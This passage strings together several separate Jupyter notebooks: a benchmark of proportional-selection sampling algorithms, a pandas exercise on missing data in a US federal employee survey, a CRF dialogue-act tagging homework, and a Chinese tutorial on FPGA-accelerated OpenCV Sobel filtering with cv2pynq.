        pass
```
Linear Walk
---
Sampling via linear walk is $O(n)$. The algorithm generates a random number between 0 and the sum of the frequencies. Then, it walks through the array of frequencies, producing a running total. At some point the running total exceeds the generated threshold. The index at that point is the selection.
The algorithm has no cost associated with updates to the underlying frequency distribution.
```
class LinearWalk(PropSelection):
    """O(n) sampling by walking a running total of the raw frequencies.

    Updates are O(1): only the grand total must be maintained.
    """

    def __init__(self, n):
        super(LinearWalk, self).__init__(n)
        self._total = 0

    def __setitem__(self, i, x):
        delta = x - self._frequencies[i]
        self._total += delta
        self._frequencies[i] = x

    def sample(self):
        # Draw a point on the (implicit) CDF, then walk until we pass it.
        threshold = random.randint(0, self._total - 1)
        running = 0
        for index, freq in enumerate(self._frequencies):
            running += freq
            if running > threshold:
                return index
```
Bisecting Search
---
Sampling via bisecting search is $O(log~n)$. From an asymptotic perspective, this is better than a linear walk. However, the algorithm achieves this by spending some compute time up front. That is, before sampling occurs. It cannot sample directly over the frequency distribution. Instead, it transforms the frequencies into a cumulative density function (CDF). This is an $O(n)$ operation. It must occur every time an element in the frequency distribution changes.
Given the CDF, the algorithm draws a random number from [0, 1). It then uses bisection to identify the insertion point in the CDF for this number. This point is the selected index.
```
class BisectingSearch(PropSelection):
    """O(log n) sampling by bisection over a precomputed CDF.

    ``normalize`` rebuilds the CDF in O(n); it must be called after any
    frequency change and before ``sample``.
    """

    def __init__(self, n):
        super(BisectingSearch, self).__init__(n)
        self._cdf = None
        self._total = 0

    def __setitem__(self, i, x):
        # O(1) update; the CDF itself is only rebuilt on normalize().
        self._total += (x - self._frequencies[i])
        self._frequencies[i] = x

    def normalize(self):
        """Rebuild the CDF from the current frequencies (O(n))."""
        total = float(sum(self._frequencies))
        cdf = []
        accumulator = 0.0
        for x in self._frequencies:
            accumulator += (x / total)
            cdf.append(accumulator)
        self._cdf = cdf

    def sample(self):
        # Fix: floating-point rounding can leave cdf[-1] fractionally below
        # 1.0, in which case bisect_left may return n (an out-of-range
        # index). Clamp to the last valid index.
        return min(bisect_left(self._cdf, random.random()), self._n - 1)
```
Stochastic Acceptance
---
For sampling, stochastic acceptance is $O(1)$. With respect to time, this dominates both the linear walk and bisecting search methods. Yet, this is asymptotic. The algorithm generates many random numbers per selection. In fact, the number of random variates grows in proportion to $n$. So, the random number generator matters.
This algorithm has another advantage. It can operate on the raw frequency distribution, like linear walk. It only needs to track the maximum value in the frequency distribution.
```
class StochasticAcceptance(PropSelection):
    """O(1)-expected sampling via rejection against the maximum frequency.

    Repeatedly draws a uniform index and accepts it with probability
    freq[i] / max_freq (Lipowski & Lipowska's stochastic acceptance).
    """

    def __init__(self, n):
        super(StochasticAcceptance, self).__init__(n)
        self._max_value = 0

    def __setitem__(self, i, x):
        last_x = self._frequencies[i]
        # Bug fix: write the new value *before* any rescan. The original
        # rescanned max(self._frequencies) first, so the old maximum was
        # still present in the list and _max_value could never decrease,
        # silently skewing every subsequent sample.
        self._frequencies[i] = x
        if x > self._max_value:
            self._max_value = float(x)
        elif last_x == self._max_value and x < last_x:
            # The previous maximum shrank: rescan for the new one (O(n)).
            self._max_value = float(max(self._frequencies))

    def sample(self):
        # Bind to locals: this loop can run many times per draw.
        n = self._n
        max_value = self._max_value
        freqs = self._frequencies
        while True:
            i = int(n * random.random())
            if random.random() < freqs[i] / max_value:
                return i
```
First Demonstration: Sampling
---
The following code generates a target frequency distribution. Then, it instantiates each algorithm; copies the frequency distribution; and, draws 10,000 samples. For each algorithm, this code compiles the resulting probability distribution. For comparison, I plot these side by side. In the figure below, the target distribution is to the left (green). The linear walk, bisecting search, and stochastic acceptance algorithms are to the right of the target distribution (blue).
Visually, there is a compelling case for the distributions being equal.
```
# Side-by-side comparison: target distribution vs the empirical distribution
# produced by 10,000 draws from each algorithm.
fig, ax = plt.subplots(1, 4, sharey=True, figsize=(10,2))

def plot_proportions(xs, ax, **kwargs):
    # Normalise raw frequencies to proportions before plotting.
    xs = pd.Series(xs)
    xs /= xs.sum()
    return xs.plot(kind='bar', ax=ax, **kwargs)

def sample_and_plot(roulette_algo, ax, n_samples=10000, **kwargs):
    # Draw n_samples and plot the resulting empirical proportions.
    samples = [roulette_algo.sample() for _ in range(n_samples)]
    value_counts = pd.Series(samples).value_counts().sort_index()
    props = (value_counts / value_counts.sum())
    props.plot(kind='bar', ax=ax, **kwargs)
    return samples

freqs = np.random.randint(1, 100, 10)
plot_proportions(freqs,
                 ax[0],
                 color=sns.color_palette()[1],
                 title="Target Distribution")
klasses = [LinearWalk, BisectingSearch, StochasticAcceptance]
for i, klass in enumerate(klasses):
    algo = klass(len(freqs))
    algo.copy_from(freqs)
    algo.normalize()
    name = algo.__class__.__name__
    xs = sample_and_plot(algo, ax=plt.subplot(ax[i+1]), title=name)
```
Second Demonstration: Performance Testing
---
The following code times the sample method for each algorithm. I am using the `timeit` module's `default_timer` for timing. For such fast functions, this may lead to measurement error. But, over 10,000 samples, I expect these errors to wash out.
```
import timeit

def sample_n_times(algo, n):
    """Time ``n`` individual calls to ``algo.sample()``.

    Returns the per-call wall-clock durations as a numpy array.
    """
    timer = timeit.default_timer
    durations = []
    for _ in range(n):
        began = timer()
        algo.sample()
        durations.append(timer() - began)
    return np.array(durations)
# Collect 10,000 per-sample timings for each algorithm (n fixed at 10).
timings = []
for i, klass in enumerate(klasses):
    algo = klass(len(freqs))
    algo.copy_from(freqs)
    algo.normalize()
    name = algo.__class__.__name__
    timings.append((name, sample_n_times(algo, 10000)))
```
The graph immediately below plots the distribution of timings for each algorithm. I truncate the results, limiting the range to everything less than the 90th percentile. (I'll explain why momentarily.) Bisecting search appears to be the fastest and the most stable. This makes sense. It has nice worst-case properties.
Stochastic acceptance and linear walk both display variability in timings. Again, the timer is not very precise. But, since bisecting search used the same timer, a comparison is possible. Linear walk has a worst case performance of $O(n)$. That is, if it starts at index 0 and generates the maximum value, it has to traverse the entire array. Stochastic acceptance generates a stream of random numbers until finding an acceptable one. Technically, this algorithm has no limit. It could loop infinitely, waiting for a passing condition. But, probabilistically, this is fantastically unlikely. (Sometimes, you come across coders saying code like this is incorrect. That's pretty absurd. Most of the time, the probability of pathological conditions is so small, it's irrelevant. Most of the time, the machine running your code is more likely to crumble to dust before an error manifests.)
For real-time code, timing variability matters. Introduce some jitter into something like a HFT algorithm, and you lose. But, for agent-based models and offline machine learning, variability doesn't matter. For us, averages matter.
```
# Boxplot of timings, truncated to rows below the column-wise 90th
# percentile to strip timer-noise outliers.
values = np.vstack([times for _, times in timings]).T
values = values[np.all(values < np.percentile(values, 90, axis=0), axis=1)]
sns.boxplot(values, names=[name for name, _ in timings]);
```
The relationship between algorithms remains the same. But, the difference between linear walk and stochastic acceptance grows. Over the entire distribution, stochastic acceptance lags both linear walk and bisecting search.
```
# Same plot restricted to the slowest tail (rows above the 90th percentile).
values = np.vstack([times for _, times in timings]).T
values = values[np.all(values > np.percentile(values, 90, axis=0), axis=1)]
sns.boxplot(values, names=[name for name, _ in timings]);
```
Third Demonstration: Average Time as a Function of N
---
The previous demonstrations fixed n to 10. What happens as n increases?
```
import timeit

# NOTE(review): re-defines the identical sample_n_times from the second
# demonstration — harmless duplication from the notebook cell layout.
def sample_n_times(algo, n):
    # Time n individual sample() calls; return per-call durations.
    samples = []
    for _ in range(n):
        start = timeit.default_timer()
        algo.sample()
        samples.append(timeit.default_timer() - start)
    return np.array(samples)
# Mean per-sample time for each algorithm as n grows by powers of ten.
averages = []
for n in [10, 100, 1000, 10000, 100000, 1000000]:
    row = {'n': n}
    freqs = np.random.randint(1, 100, n)
    for i, klass in enumerate(klasses):
        algo = klass(len(freqs))
        algo.copy_from(freqs)
        algo.normalize()
        name = algo.__class__.__name__
        row[name] = np.mean(sample_n_times(algo, 10000))
    averages.append(row)
```
The following graph plots the average time as a function of n, the number of elements in the distribution. There is nothing unexpected. Linear walk gets increasingly terrible. It's $O(n)$. Bisecting search out-performs Stochastic acceptance. They appear to be converging. But, this convergence occurs at the extreme end of n. Few simulations sample over a distribution of 1,000,000 values.
At this point, it seems like bisecting search is the best choice.
```
# Log-log plot of mean runtime vs n for the three algorithms.
averages_df = pd.DataFrame(averages).set_index('n')
averages_df.plot(logy=True, logx=True,
                 style={'BisectingSearch': 'o-',
                        'LinearWalk': 's--',
                        'StochasticAcceptance': 'd:'})#marker='o')
plt.ylabel('$Average runtime$');
```
Fourth Demonstration: Time Given a Dynamic Distribution
---
Many of my simulations use proportional selection with dynamic proportions. For example, consider preferential attachment in social network generation. Edges form probabilistically, proportional to a node's degree. But, when an edge forms, the degree changes as well. In this case, the distribution changes *for each sample*!
Below, I repeat the previous experiment, but I change the distribution and call `normalize` before each sample. Bisecting search is now the loser in this race. After each frequency alteration, it runs an expensive $O(n)$ operation. Then, it still must run its $O(log~n)$ operation at sample time. Linear walk and stochastic acceptance incur almost no performance penalty for alterations. Linear walk merely updates the total count. And, stochastic acceptance only runs a calculation if the alteration reduces the maximum value. (This hints at an important exception. As the range of frequencies narrows and the number of elements increases, performance suffers. The number of $O(n)$ searches for the new maximum becomes expensive.)
```
import timeit

def normalize_sample_n_times(algo, n_samples, n):
    """Mutate one random frequency, then time normalize()+sample() together,
    ``n_samples`` times. Returns per-iteration durations as a numpy array.

    The mutation itself is untimed, so each measurement reflects whatever
    re-normalisation cost the algorithm pays per draw.
    """
    timer = timeit.default_timer
    durations = []
    for _ in range(n_samples):
        algo[random.randint(0, n-1)] = random.randint(1, 100)
        began = timer()
        algo.normalize()
        algo.sample()
        durations.append(timer() - began)
    return np.array(durations)
# Repeat the scaling experiment with a distribution that changes before
# every draw, then plot mean runtime vs n on log-log axes.
averages = []
for n in [10, 100, 1000, 10000, 100000]:
    row = {'n': n}
    freqs = np.random.randint(1, 100, n)
    for i, klass in enumerate(klasses):
        algo = klass(len(freqs))
        algo.copy_from(freqs)
        algo.normalize()
        name = algo.__class__.__name__
        row[name] = np.mean(normalize_sample_n_times(algo, 1000, n))
    averages.append(row)
averages_df = pd.DataFrame(averages).set_index('n')
averages_df.plot(logy=True, logx=True,
                 style={'BisectingSearch': 'o-',
                        'LinearWalk': 's--',
                        'StochasticAcceptance': 'd:'})#marker='o')
plt.ylabel('$Average runtime$');
```
Conclusions
---
"Premature optimization is the root of all evil." This is programmer's cannon -- The Gospel According to Knuth. Certainly, I'm not advocating for heresy. I wrote this post after a project of mine demanded better performance. Execution took too long. I did some profiling. It told me that proportional selection dominated execution time. So, partially, this notebook is a guide for modelers in similar situations. Given a dynamic distribution and proportional selection, stochastic acceptance has great performance.
Outside of dynamic distributions, it does not dominate performance-wise in all cases. And, it is subject to jitter, making it questionable for real-time systems. But, it is robust across a variety of usage patterns. Furthermore, the algorithm is straight-forward to implement. The following code expresses it in its simplest form. There are no dependencies, other than to a random number generator. And random number generation is a universal facility in programming languages.
```python
def random_proportional_selection(freqs, max_freq):
    """Pick an index with probability proportional to ``freqs[index]``.

    Rejection sampling: draw a uniform index and accept it with probability
    freqs[i] / max_freq. ``max_freq`` must be the maximum of ``freqs``.
    """
    size = len(freqs)
    while True:
        candidate = int(size * random.random())
        if random.random() < (freqs[candidate] / float(max_freq)):
            return candidate
```
Given these properties, I think it makes a good default approach to proportional selection. And, rewards accrue to those who collect good defaults.
| github_jupyter |
# INFO 3402 – Class 16: Missing data exercise
[Brian C. Keegan, Ph.D.](http://brianckeegan.com/)
[Assistant Professor, Department of Information Science](https://www.colorado.edu/cmci/people/information-science/brian-c-keegan)
University of Colorado Boulder
Copyright and distributed under an [MIT License](https://opensource.org/licenses/MIT)
```
import numpy as np
import pandas as pd
%matplotlib inline
import matplotlib.pyplot as plt
import seaborn as sb
```
We'll use a dataset I partially cleaned from the Office of Personnel Management's [Federal Employees Viewpoint Survey](https://www.opm.gov/fevs/public-data-file), which has been distributed annually since 2010. If you're interested in how to clean up the data from the raw files, look at the Appendix notebook I uploaded.
The annual surveys ask approximately 80 questions about job satisfaction, organizational performance, manager competence, *etc*. as well as demographic variables about each respondent. Each annual survey has between 263,475 and 687,687 responses, which totals several hundred megabytes. Rather than sharing these individual survey responses, I extracted a handful of fields. The values of the survey items are on a Likert scale where 1 is "low" and 5 is "high".
* **count**: the number of responses in this category. Integer.
* **important work** (Q13): "The work I do is important". 1 = "Strongly Disagree" to 5 = "Strongly Agree".
* **work quality** (Q28): "How would you rate the overall quality of work done by your work unit?". 1 = "Very Poor" to 5 = "Very Good".
* **successful mission** (Q39): "My agency is successful at accomplishing its mission." 1 = "Strongly Disagree" to 5 = "Strongly Agree".
* **like work** (Q5): "I like the kind of work I do." 1 = "Strongly Disagree" to 5 = "Strongly Agree".
* **job satisfaction** (Q69): "Considering everything, how satisfied are you with your job?" 1 = "Very Dissatisfied" to 5 = "Very Satisfied"
* **org satisfaction** (Q71): "Considering everything, how satisfied are you with your organization?" 1 = "Very Dissatisfied" to 5 = "Very Satisfied"
I broke these responses down by a combination of demographic and other covariates.
* **year**: year of the survey. Values range from 2010 through 2018.
* **agency**: the parent federal agency/department.
* **subagency**: the child federal agency/department.
* **supervisor**: whether the employee is a supervisor or not.
* **sex**: male or female.
* **minority**: minority or not.
* **leaving**: "Are you considering leaving your organization within the next year, and if so, why?" Responses include "No", "Yes, to take another job within the federal government", "Yes, to take another job outside the federal government", and "Yes, other"
Read in the data.
```
# Load the pre-aggregated FEVS summary (one row per demographic permutation).
df = pd.read_csv('fevs_summary_2010-2018.csv',encoding='utf8')
print("There are {0:,} rows.".format(len(df)))
df.tail(10)
```
## Explore missing data
Count the values for "supervisor", "sex", "minority", "leaving", and "agency" to confirm.
```
# Category counts for each demographic/covariate column.
df['supervisor'].value_counts()
df['sex'].value_counts()
df['minority'].value_counts()
df['leaving'].value_counts()
df['agency'].value_counts()
```
Sort the values to find the demographic permutation with the greatest number of responses.
```
# Largest response counts first: the top row is the most common permutation.
df.sort_values('count',ascending=False).head()
```
Use `pivot_table` to count the number of responses by year.
```
# Total number of survey responses per year.
pd.pivot_table(df,index='year',values='count',aggfunc='sum')
```
Even though the demographics are balanced, it does not mean the survey responses are. Make a `nonan_df` using `dropna` to remove missing rows of data. How many rows of data remain after dropping the missing values under "count"?
```
# Drop rows whose 'count' is missing and report how many remain.
nonan_df = df.dropna(subset=['count'])
len_before = len(df)
len_after = len(nonan_df)
print("There were {0:,} rows before and {1:,} rows after.".format(len_before,len_after))
```
Use boolean indexing and `pandas`'s [`.isnull()`](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.isnull.html) method to make a new DataFrame called `missing_df` containing only the rows missing values.
```
# Keep only the rows with a missing 'count'.
missing_df = df[df['count'].isnull()]
missing_df.head()
```
Which agencies or subagencies have the most missing values? Which have the fewest?
```
# Fixed: the original cell was syntactically incomplete (`values = )`).
# Count missing-count rows per agency, most affected agencies first.
missing_df['agency'].value_counts()
```
Are male or female demographics more likely to have missing data?
## Make a pivot table
Make a pivot table with "year" as indices, "agency" as columns, and the average "org satisfaction" as values.
```
# Mean org satisfaction per year (rows) and agency (columns).
# NOTE(review): this averages row-level means without weighting by 'count';
# confirm that unweighted means are intended for this exercise.
pt = pd.pivot_table(df,index='year',columns='agency',values='org satisfaction',aggfunc='mean')
pt.plot(legend=False)
```
Average the pivot table by year. Which year had the highest satisfaction?
```
# Average across agencies per year; the last value after sorting is highest.
pt.mean(axis=1).sort_values()
```
Average the pivot table by agency. Which agency has the highest satisfaction?
```
# Average across years per agency, highest satisfaction first.
pt.mean(axis=0).sort_values(ascending=False)
```
## Make exploratory pointplots
Use `seaborn` to make a [pointplot](https://seaborn.pydata.org/generated/seaborn.pointplot.html) of job satisfaction by year.
```
# Job satisfaction by year.
sb.pointplot(x='year',y='job satisfaction',data=df)
```
Update the pointplot to include a hue by supervisor status. What are interesting trends or differences?
```
# Same plot, split by supervisor status.
sb.pointplot(x='year',y='job satisfaction',hue='supervisor',data=df)
```
Update the catplot to include column facets by sex. What are interesting trends or differences?
```
# Point plot of work quality by year, hue-split by sex (points dodged).
sb.catplot(x='year',y='work quality',hue='sex',data=df,kind='point',dodge=.25)
```
Make some other exploratory pointplots for this data.
```
# Drill into a single agency (Department of Energy) for the same comparison.
df['agency'].value_counts()
sb.catplot(x='year',y='work quality',hue='sex',data=df.query("agency == 'Department of Energy'"),
           kind='point',dodge=.25)
```
| github_jupyter |
# NLP HW3
Name : Thamme Gowda
USCID : 2074-6694-39
```
from itertools import chain
import nltk
import pycrfsuite as crf
import os, sys, glob, csv
from collections import namedtuple
import pandas as pd
import numpy as np
from collections import defaultdict as ddict
# Terminal-bell helper: beep x times (each beep also sleeps 0.5 s).
beep = lambda x: os.system("echo -n '\a';sleep 0.5;" * x)
beep(2)
# Code given by TAs
def get_utterances_from_file(dialog_csv_file):
    """Returns a list of DialogUtterances from an open file."""
    rows = csv.DictReader(dialog_csv_file)
    utterances = []
    for row in rows:
        utterances.append(_dict_to_dialog_utterance(row))
    return utterances
def get_utterances_from_filename(dialog_csv_filename):
    """Returns a list of DialogUtterances from an unopened filename."""
    with open(dialog_csv_filename, "r") as handle:
        return get_utterances_from_file(handle)
def get_data(data_dir):
    """Generate (filename, utterances) pairs, one per dialog CSV file.

    To get a list of all dialogs call list(get_data(data_dir)).
    data_dir - a dir with csv files containing dialogs."""
    pattern = os.path.join(data_dir, "*.csv")
    for dialog_filename in sorted(glob.glob(pattern)):
        yield dialog_filename, get_utterances_from_filename(dialog_filename)
DialogUtterance = namedtuple("DialogUtterance", ("act_tag", "speaker", "pos", "text"))
PosTag = namedtuple("PosTag", ("token", "pos"))
def _dict_to_dialog_utterance(du_dict):
"""Private method for converting a dict to a DialogUtterance."""
# Remove anything with
for k, v in du_dict.items():
if len(v.strip()) == 0:
du_dict[k] = None
# Extract tokens and POS tags
if du_dict["pos"]:
du_dict["pos"] = [
PosTag(*token_pos_pair.split("/"))
for token_pos_pair in du_dict["pos"].split()]
return DialogUtterance(**du_dict)
class CrfClassifier(object):
    """Dialogue-act tagger: a linear-chain CRF (pycrfsuite) over per-utterance
    features, trained with one CRF sequence per dialogue."""

    def __init__(self, max_iters=50, l1_reg=1.0, l2_reg=1e-3):
        self.trainer = crf.Trainer(verbose=False)
        self.trainer.set_params({
            'c1': l1_reg,  # coefficient for L1 penalty
            'c2': l2_reg,  # coefficient for L2 penalty
            'max_iterations': max_iters,  # stop earlier
            # include transitions that are possible, but not observed
            'feature.possible_transitions': True
        })

    def featurize(self, idx, dialog):
        """Build the feature list for utterance `idx` of `dialog`:
        dialogue-start / speaker-change indicators plus token and
        positional POS features."""
        feats = []
        if idx == 0:
            feats.append("BOD")  # beginning of dialogue
        else:
            if dialog[idx].speaker != dialog[idx-1].speaker:
                feats.append('SPKRCNG')  # speaker Change
        utterance = dialog[idx]
        if utterance.pos is not None:
            for i, pos in enumerate(utterance.pos):
                feats.append("TOKEN_%s" % (pos.token))
                feats.append("POS[%d]=%s" % (i+1, pos.pos))
        else:
            # No POS tags available: strip the <>. markup and use the raw
            # words as positional "action" features instead.
            tokens = utterance.text.replace('>', '').replace('<', '').replace('.', '').split()
            for i, tok in enumerate(tokens):
                feats.append("ACTN[%d]=%s" % (i+1, tok))
        return feats

    def transform(self, dialog):
        """Convert one dialog into (X, Y): per-utterance feature lists and
        their act-tag labels."""
        X, Y = [], []
        for idx, utterance in enumerate(dialog):
            Y.append(utterance.act_tag)
            X.append(self.featurize(idx, dialog))
        return X, Y

    def train(self, train_dir, model_path):
        """Train on every dialog CSV in `train_dir`; save to `model_path`.

        Terminology:
            directory has dialogues (in each file)
            dialogues have utterances (in each line)
            utterances have label, speaker, tokens and the text
        """
        dialogs = get_data(train_dir)
        for f_name, dialog in dialogs:
            X, Y = self.transform(dialog)
            self.trainer.append(X, Y)  # one CRF sequence per dialogue
        print("Training and saving model to %s" % model_path)
        self.trainer.train(model_path)
        print("Done")

    def load_model(self, model_file):
        """Open a previously trained model file for tagging."""
        self.tagger = crf.Tagger()
        self.tagger.open(model_file)

    def test(self, test_dir):
        """Yield (gold, predicted) tag pairs over all dialogs in `test_dir`."""
        dialogs = get_data(test_dir)
        for f_name, dialog in dialogs:
            X, Y = self.transform(dialog)
            predY = self.tagger.tag(X)
            assert len(Y) == len(predY)
            for i in range(len(Y)):
                yield(Y[i], predY[i])

    def evaluate(self, dev_dir):
        """Return (accuracy, confusion_matrix) on `dev_dir`, where the
        matrix is matrix[actual][predicted] -> count."""
        print("Evaluating %s" % dev_dir)
        recs = self.test(dev_dir)
        matrix = ddict(lambda: ddict(int))
        for actual, predicted in recs:
            matrix[actual][predicted] += 1
        # accuracy = trace / grand total of the confusion matrix
        trace = 0
        for cls in matrix.keys():
            trace += matrix[cls][cls]
        tot = 0
        for d in matrix.values():
            tot += sum(d.values())
        return trace / tot, matrix

    def predict(self, data_dir, out_file):
        """Tag every dialog in `data_dir` and write predictions to `out_file`
        in the grader's format: a Filename="..." header per dialog, one tag
        per line, then a blank line."""
        dialogs = get_data(data_dir)
        with open(out_file, 'w') as out:
            for f_name, dialog in dialogs:
                out.write('Filename="%s"\n' % f_name.split("/")[-1])
                X, _ = self.transform(dialog)
                predY = self.tagger.tag(X)
                assert len(predY) == len(X)
                out.write("\n".join(predY))
                out.write("\n\n")
        print("Output stored at %s" % out_file)

    def train_predict(self, train_dir, data_dir, out_file, model_file="crf_model.data"):
        """Convenience wrapper: train, reload the saved model, then predict."""
        self.train(train_dir, model_file)
        self.load_model(model_file)
        self.predict(data_dir, out_file)
# Train on the training dialogs and tag the dev dialogs.
train_dir = "../data/train"
dev_dir = "../data/dev"
output_file = "output1.txt"
CrfClassifier().train_predict(train_dir, dev_dir, output_file)
# IPython shell magic: peek at the first predictions.
!head output1.txt
```
# Advanced CRF
```
%%time
class AdvancedCRF(CrfClassifier):
    """CrfClassifier with extra context features: end-of-dialogue markers,
    0-indexed positional token/POS features, and token/POS bigrams."""

    def featurize(self, idx, dialog):
        feats = super(AdvancedCRF, self).featurize(idx, dialog)
        # more features here
        #feats.append("_bias_")
        if idx == len(dialog) - 1:
            feats.append("EOD")  # last utterance of the dialogue
            pass
        if idx == len(dialog) - 2:
            feats.append("EOD[-1]")  # second-to-last utterance
            pass
        utter = dialog[idx]
        if utter.pos is not None:
            # 0-indexed positional unigrams (the base class emits 1-indexed
            # ones, so both feature families coexist).
            for i in range(len(utter.pos)):
                feats.append("TOKEN[%d]=%s" % (i, utter.pos[i].token))
                feats.append("POS[%d]=%s" % (i, utter.pos[i].pos))
            # adjacent token and POS bigrams
            for i in range(len(utter.pos) - 1):
                feats.append("TOKEN_%s|TOKEN_%s" % (utter.pos[i].token, utter.pos[i+1].token))
                feats.append("POS_%s|POS_%s" % (utter.pos[i].pos, utter.pos[i+1].pos))
        # NOTE(review): the previous/next-utterance features below are
        # disabled experiments; prev_feats is computed but never used.
        if idx > 0:
            prev_feats = super(AdvancedCRF, self).featurize(idx-1, dialog)
            prev_feats = filter(lambda x: 'POS' in x, prev_feats)
            #feats.extend(list(map(lambda x: "PREV_%s" % x, prev_feats)))
        if idx < len(dialog) - 1:
            #next_feats = super(AdvancedCRF, self).featurize(idx+1, dialog)
            #feats.extend(list(map(lambda x: "NEXT_%s" % x, next_feats)))
            # add next
            pass
        return feats
AdvancedCRF(max_iters=50).train_predict(train_dir, dev_dir, output_file)
```
# Evaluation
```
def evaluate_output(dev_dir, out_file):
    """Compare predictions written by predict() against the gold tags.

    Returns (accuracy, confusion) where confusion maps
    true tag -> predicted tag -> count.
    """
    # Gold tags per dialog file, keyed by bare filename.
    gold = {}
    for fn, dialog in get_data(dev_dir):
        gold[fn.split('/')[-1]] = [utter.act_tag for utter in dialog]
    confusion = ddict(lambda: ddict(int))  # confusion matrix
    with open(out_file) as inp:
        pos = 0
        current = None
        for line in (raw.strip() for raw in inp):
            if line.startswith('Filename='):
                current = line.split('=')[1].replace('"', '')
            elif not line:  # blank line separates dialogs
                pos = 0
            else:
                confusion[gold[current][pos]][line] += 1
                pos += 1
    total = sum(sum(row.values()) for row in confusion.values())
    correct = sum(confusion[tag][tag] for tag in confusion.keys())
    return correct / total, confusion
# Score the CRF output against the dev gold labels and show the confusion matrix.
perf, dod = evaluate_output(dev_dir, output_file)
print(perf)
pd.DataFrame(dod)  # NOTE(review): relies on pandas being imported as pd elsewhere
```
| github_jupyter |
# 通过PYNQ加速OPENCV函数(Sobel算子)
在阅读本部分UserGuide时,请确认已做好以下准备:
* 已经按照之前的预备文档安装好依赖环境<br>
* 2根HDMI传输线(对输入视频流以及输出视频流进行测试)
* 一台支持HDMI的显示器(对输入视频流以及输出视频流进行测试)
## 步骤1:加载cv2pynq库
```
import cv2pynq as cv2
```
在正常运行的情况下,可以看到PYNQ板卡标记为“DONE”的LED闪烁(为加载了bit文件的效果);
这是由于在封装的时候,我们在初始化阶段调用了Overlay方法给PYNQ加载了定制的bit文件:
```python
def __init__(self, load_overlay=True):
self.bitstream_name = None
self.bitstream_name = "cv2pynq03.bit"
self.bitstream_path =os.path.join(CV2PYNQ_BIT_DIR,self.bitstream_name)
self.ol = Overlay(self.bitstream_path)
```
上述代码为cv2pynq.py的部分节选,从当中可以看出在初始化的过程中,加载了cv2pynq03.bit,
因此在导入库的时候会出现加载bit文件的效果。加载的bit文件的Block Design如下图所示:

这个Block Design主要由以下三个部分组成:
* HDMI输入输出模块(移植于BaseOverlay)
* 由Vivado HLS生成的OPENCV算法加速IP核(内嵌于Image_Fliter模块)
* 基于AXI总线架构的流传输通道
## 步骤2:对单张图像的处理效果测试
### 步骤2.1:采用原始的OpenCV中的Sobel算子对输入图像进行处理
在进行原始处理效果测试前,我们需要导入以下模块
* 导入原始的OPENCV
* 导入time模块计算处理的时间
* 导入Pillow模块用于读取图像
* 导入numpy模块将jpeg格式的图片转化为数组形式
```
# Baseline: time the pure-software OpenCV Sobel (x-gradient, 5x5 kernel)
# on a single test image, averaged over 10 runs.
import cv2 as openCV
import time
from PIL import Image
import numpy as np
frame_in = Image.open('../image/lena.jpg')
img_in = np.array(frame_in)
fps_opencv = 0
fps_cv2pynq_with_cma = 0
fps_cv2pynq_without_cma = 0
start = time.time()
for i in range(10):
    out_opencv = openCV.Sobel(img_in,-1,1,0,ksize=5)
end = time.time()
img_opencv = Image.fromarray(out_opencv.astype('uint8'))
fps_opencv = 1.0/((end - start)/10)  # average frames/second over the 10 runs
print("Frames per second using openCV: " + str(fps_opencv))
img_opencv
```
### 步骤2.2:采用cv2pynq中的Sobel算子对输入图像进行处理
```
# Same benchmark through cv2pynq's hardware-accelerated Sobel
# (no contiguous-memory buffers yet, so each frame is copied).
start = time.time()
for i in range(10):
    out_cv2pynq1 = cv2.Sobel(img_in,-1,1,0,ksize=5)
end = time.time()
img_cv2pynq_0 = Image.fromarray(out_cv2pynq1.astype('uint8'))
fps_cv2pynq_without_cma = 1.0/((end - start)/10)
print("Frames per second using cv2pynq without cma: " + str(fps_cv2pynq_without_cma))
img_cv2pynq_0
```
#### CMA&cv2pynq
CMA(Contiguous Memory Allocator)是智能连续内存分配技术,是Linux Kernel内存管理系统的扩展,目的在于解决需要预留大量连续内存导致运行内存紧张的问题。通过对内存的连续分配,cv2pynq可以将图片数据以流的形式传输给PL端,提高图像处理的速率;在PYNQ的原生库中提供了Xlnk类用来分配连续的内存空间,对Xlnk的更多了解,可参考:<br>
https://pynq-testing.readthedocs.io/en/master/pynq_libraries/xlnk.html
```
# Benchmark again with contiguous-memory (CMA) buffers so frames can be
# streamed to the PL by DMA without an extra copy.
from pynq import Xlnk
xlnk = Xlnk()
image_buffer = xlnk.cma_array(shape=(512,512), dtype=np.uint8)
out_buffer = xlnk.cma_array(shape=(512,512), dtype=np.uint8)
np.copyto(image_buffer,img_in)  # assumes img_in is 512x512 single-channel -- TODO confirm
start = time.time()
for i in range(10):
    cv2.Sobel(image_buffer,-1,1,0,ksize=5,dst=out_buffer)
end = time.time()
img_cv2pynq_1 = Image.fromarray(out_buffer.astype('uint8'))
fps_cv2pynq = 1.0/((end - start)/10)
print("Frames per second using cv2PYNQ: " + str(fps_cv2pynq))
image_buffer.close()  # release the CMA allocations back to the kernel
out_buffer.close()
img_cv2pynq_1
```
## 步骤3:对视频流处理的效果显示
### 步骤3.1:实例化HDMI输入输出接口
在进行cv2pynq的视频流测试之前,我们需要引入视频流,<br>此处由Block Design中设置好的HDMI输入模块传入视频以及输出模块输出经过处理好的视频流信息;<br>关于HDMI输入输出的更多详情,可以参考BaseOverlay中的Video模块;<br>https://github.com/Xilinx/PYNQ/tree/master/boards/Pynq-Z2/base/notebooks/video
<br>https://github.com/Xilinx/PYNQ/tree/master/boards/Pynq-Z1/base/notebooks/video
```
# Bring up the HDMI pipeline: grayscale input; the output mirrors the
# input's detected video mode.
hdmi_in = cv2.video.hdmi_in
hdmi_out = cv2.video.hdmi_out
hdmi_in.configure(cv2.PIXEL_GRAY)
hdmi_out.configure(hdmi_in.mode)
hdmi_in.start()
hdmi_out.start()
print(hdmi_in.mode)
```
在正确的输入视频流信息之后,我们可以得到输入视频流的配置信息;<br>在本实验中,最大支持 1920 * 1080的输入信号。
### 步骤3.2:采用原始的OpenCV中的Sobel算子对输入信号进行处理
```
# Live-video baseline: software Sobel on frames read from HDMI in,
# written back out to HDMI out.
iterations = 10
start = time.time()
for i in range(iterations):
    inframe = hdmi_in.readframe()
    outframe = hdmi_out.newframe()
    openCV.Sobel(inframe,-1,1,0,ksize=5,dst=outframe)
    inframe.freebuffer()  # return the input frame buffer to the pool
    hdmi_out.writeframe(outframe)
end = time.time()
print("Frames per second using OpenCV: " + str(iterations / (end - start)))
```
### 步骤3.3:采用cv2pynq中的Sobel算子对输入信号进行处理
```
# Same live-video loop, but through the hardware-accelerated Sobel.
import time
iterations = 10
start = time.time()
for i in range(iterations):
    inframe = hdmi_in.readframe()
